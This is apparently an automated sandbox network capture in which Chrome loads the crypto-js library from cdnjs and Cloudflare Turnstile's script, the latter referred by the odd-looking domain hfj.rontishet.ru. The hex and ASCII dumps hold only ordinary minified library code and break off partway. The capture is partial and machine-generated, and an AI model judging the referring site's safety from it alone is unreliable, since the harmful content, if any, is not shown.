                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    11192.168.2.449755104.17.24.144434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:25 UTC386OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: cdnjs.cloudflare.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:26 UTC928INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 17:20:26 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=30672000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: W/"61182885-40eb"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cf-cdnjs-via: cfworker/kv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 328328
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Expires: Sat, 20 Sep 2025 17:20:26 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hMKP7xtaGCCiEx6jF%2BVpT3ZS7XgRkUDyLt3zaGhRCpPt0sIW7TB4Hw6lTJKQlB4yK3I%2FowgpUwmVVc8zXCpL4jpGIgV83Zqx0mYA2U70G3c3i9Ny0G8%2B9mrLFCfykY19Vm08EjrV"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=15780000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    CF-RAY: 8cb5e232cb59c35a-EWR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:26 UTC441INData Raw: 33 39 37 61 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 397a!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:26 UTC1369INData Raw: 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 7c 7c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 2e 70 72 6f 74 6f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.proto
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:26 UTC1369INData Raw: 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73 28 34 29 2e 72 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)try{return i.randomBytes(4).re
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:26 UTC1369INData Raw: 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 63 3b 61 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 28 69 2c 61 29
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ta.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c;a+=o)this._doProcessBlock(i,a)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:26 UTC1369INData Raw: 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 35 5d 3d 65 5b 35 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>0?1:0)|0,e[5]=e[5]+886263092+(e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:26 UTC1369INData Raw: 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 33 5d 3d 49 5b 33 5d 2b 28 49 5b 32 5d 3c 3c 38 7c 49 5b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0]>>>16)|0,t[3]=I[3]+(I[2]<<8|I[
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:26 UTC1369INData Raw: 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 77 6f 72 64 73 2c 72 3d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:function(t){for(var e=t.words,r=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:26 UTC1369INData Raw: 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ndexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:26 UTC1369INData Raw: 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69 73 2e 5f 68 61 73 68 2e 77 6f 72 64 73 2c 73 3d 74 5b 65 2b 30 5d 2c 63 3d 74 5b 65 2b 31 5d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: nd({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=this._hash.words,s=t[e+0],c=t[e+1]
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:26 UTC1369INData Raw: 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41 5b 35 30 5d 29 2c 62 3d 44 28 62 2c 78 2c 53 2c 6d 2c 66 2c 32 31 2c 41 5b 35 31 5d 29 2c 6d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A[50]),b=D(b,x,S,m,f,21,A[51]),m


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    12192.168.2.449754104.18.94.414434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:25 UTC647OUTGET /turnstile/v0/g/ec4b873d446c/api.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://hfj.rontishet.ru/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:26 UTC441INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 17:20:26 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 47262
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    last-modified: Tue, 17 Sep 2024 16:06:37 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    access-control-allow-origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    CF-RAY: 8cb5e232cbb55e6b-EWR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:26 UTC928INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 56 74 28 65 2c 72 2c 61 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 66 3d 65 5b 6c 5d 28 67 29 2c 70 3d 66 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 73 29 7b 61 28 73 29 3b 72 65 74 75 72 6e 7d 66 2e 64 6f 6e 65 3f 72 28 70 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 70 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 61 29 3b 66 75 6e 63 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: "use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);funct
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:26 UTC1369INData Raw: 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 61 2e 70 75 73 68 2e 61 70 70 6c 79 28 61 2c 6f 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 74 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75 6c 6c 3f 72 3a 7b 7d 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ct.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),a.push.apply(a,o)}return a}function tt(e,r){return r=r!=null?r:{},Object.getOwnPropertyD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:26 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 48 74 28 65 29 7c 7c 42 74 28 65 2c 72 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 6a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 50 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 44 65 28 65 2c 72 29 7b 76 61 72 20 61 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30 5d 26 31 29 74 68 72 6f 77 20 6c 5b 31 5d 3b 72 65 74 75 72 6e 20 6c 5b 31 5d 7d 2c 74 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: function Ae(e,r){return Ht(e)||Bt(e,r)||qt(e,r)||jt()}function P(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function De(e,r){var a={label:0,sent:function(){if(l[0]&1)throw l[1];return l[1]},tr
